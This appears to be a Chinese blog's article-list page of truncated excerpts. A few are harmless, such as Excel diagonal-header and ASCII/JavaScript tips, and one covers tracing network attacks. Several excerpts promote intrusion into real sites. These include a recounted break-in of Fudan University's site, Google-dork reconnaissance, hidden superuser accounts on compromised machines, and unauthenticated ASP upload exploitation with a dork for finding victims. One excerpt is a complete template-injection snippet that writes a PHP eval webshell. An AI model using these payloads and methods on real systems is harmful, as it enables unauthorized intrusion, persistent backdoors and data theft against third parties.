`
文章列表
你能找到在线观看地址吧?其实下载视频和音频文件根本不用软件根本不用刻意的去下载,方法简单的让人看了都直发笑,只是有的朋友不知道而已,在试看视频或试听音频文件等缓冲完后,这时候想文件已经下载到我们电脑里了,下载网页里的和暴风影音酷我音乐盒QQ空间等等方法完全一样,下面我说一下怎么下载音频或视频文件:1:打开浏览器或某个网页后,       选择:工具-internet选项-删除文件-确定。(这样做的目的是方便一会儿查找文件)2:这时候开始去试听或试看你想要下载的文件。(记住,一定要等播放的视频或音频文件   缓冲完成后再回头去找这个已经下载到电脑里的文件)3:找到已经下载到电脑里的我们刚才试听或 ...
在报表里面制作斜线表头是中国人特有的习惯,遗憾的是Excel并没有直接提供对这一样式的良好支持,所以本技巧将介绍一些方法,尽可能完美地解决这个问题。 1 单线表头 如果表头中只需要一条斜线,可以利用Excel的边框设 ...
内容提要:本文介绍excel斜线表头的制作方法,并给出实例讲解。   Excel中,如何制作复杂的斜线表头?斜线表头,就是包含有斜线和文字的单元格。IT部落窝给出方法,让学习者少走弯路。利用直线和文本框工具,不管多复杂的斜线表头,我们只要掌握了方法,都能迎刃而解。   首先,我们给出所要制作的统计表,如下图所示。   第一步,输入除了斜线以外的单元格的内容,并调整行列,编辑排版好,斜线表头最后做。在这里说明一下思路:因为调整表格的其它部分,斜线单元格的内容又需重新调整。这点大家千万要注意,不要做一些重复的工作。  第二步,斜线表头单元格的制作——斜线部分  单击绘图工具栏中的“直 ...
利用google照样可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。 ------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:xxxx.com 从返回的信息中,找到几个该校的几个系院的域名: http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没 site:xxxx.com ...
Ascii 代码表 Ascii 0 {Nulo, Sem Som} Ascii 1 Ascii 2 Ascii 3 Ascii 4 Ascii 5 Ascii 6 Ascii 7 Ascii 8 {BackSpace} Ascii 9 {Tab} Ascii 10 Ascii 11 Ascii 12 Ascii 13 {Enter} Ascii 14 Ascii 15 Ascii 16 {Shift} Ascii 17 {CTRL} Ascii 18 {ALT} Ascii 19 Ascii 20 {CapsLock} Ascii 21 Ascii 22 Ascii 23 Ascii 24 As ...
js 字符ascii码转换函数   字符转ascii码:用charCodeAt();ascii码砖字符:用fromCharCode();   看一个小例子 <script>str="A";code = str.charCodeAt(); str2 = String.fromCharCode(code);str3 = String.fromCharCode(0x60+26); document.write(code+'<br />');document.write(str2+'<br />');document.write(str ...
此文章已发表在《黑客X档案》第6期杂志上 后经本文作者hackest提交到HST技术论坛 欢迎大家转载,但请务必要记住注明此信息!   一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。 二、战略部署 这次要拿的是复旦主站,分站可不是我们的目标了,嘿嘿。要不然拿个分站就挂上复旦的名义似乎有点说不过去。通过google顺利找到复旦大学主站:http://www.fudan.edu.cn/, 如图1 PHP的程序 ...
你想测试你的Widnows系统的安全性吗? 如果你选对了工具,其实这是一件非常有趣的工作。如果你正为挑选合适的工具而苦恼,那就让本文给你一些帮助吧。   关于安全测试工具,我发现大体上你都能购买到。然而,还有一些 ...
一、如何在图形界面建立隐藏的超级用户   图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上 ...
网络是个大舞台,这个舞台中不光有安全人员也有黑客份子所组成。芳击与防守自然就成了两者之间相互论辩的话题。对于一些重要的部门,一旦网络遭到攻击,如何追踪网络攻击,追查到攻击者并将其绳之以法,是十分必要的。下面的文章分本地追踪和网络追踪两部份。   本地追踪方法   追踪网络攻击就是找到事件发生的源头。它有两个方面意义:一是指发现IP地址、MAC地址或是认证的主机名;二是指确定攻击者的身份。网络攻击者在实施攻击之时或之后,必然会留下一些蛛丝马迹,如登录的纪录,文件权限的改变等虚拟证据,如何正确处理虚拟证据是追踪网络攻击的最大挑战。   在追踪网络攻击中另一需要考虑的问题是:IP地址是一个虚拟地 ...
1.   http://w0w.cz.cc/read.php/40.htm#entrymore   2.   友情检测中国红客联盟webshell并提权       http://www.nhs8.com/post/1532.html   3.   http://www.enterer.cn/   4.   过瑞星主动的批处理,比较恶毒 http://www.darkst.com/bbs/viewthread.php?tid=56458&pid=575444&page=1&extra=page%3D1#pid575444   5.  小记一次曲折的提权 ...
Sablog-X v2.x 任意变量覆盖漏洞 author: 80vul-B team:http://www.80vul.com 一 描叙: 由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。 二 分析 common.inc.php代码里: .... $onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_va ...
方法: 编辑模板的时候写入这几行,拆开写一句话,就行了. <!--{eval $content = "@eval(\$_POST[c])";}--> <!--{eval $test1 = "<"."?"."php ".$content."?>";}--> <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->
在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了! 省得还要去穷取法破解 ...
前些天出了个Cookies注入漏洞,今天又翻了看了下~   在ADMIN目录有2个上传文件upfile.asp和upfile2.asp   这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。   另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。   1,谷歌里写上inurl:List.asp?Shop_ID   2,如果网站存在以上上传文件,90%能上传asp文件。  3,将图片123中地址替换成自己检测的网站地址即可 。  4,在选择图片 ...
Global site tag (gtag.js) - Google Analytics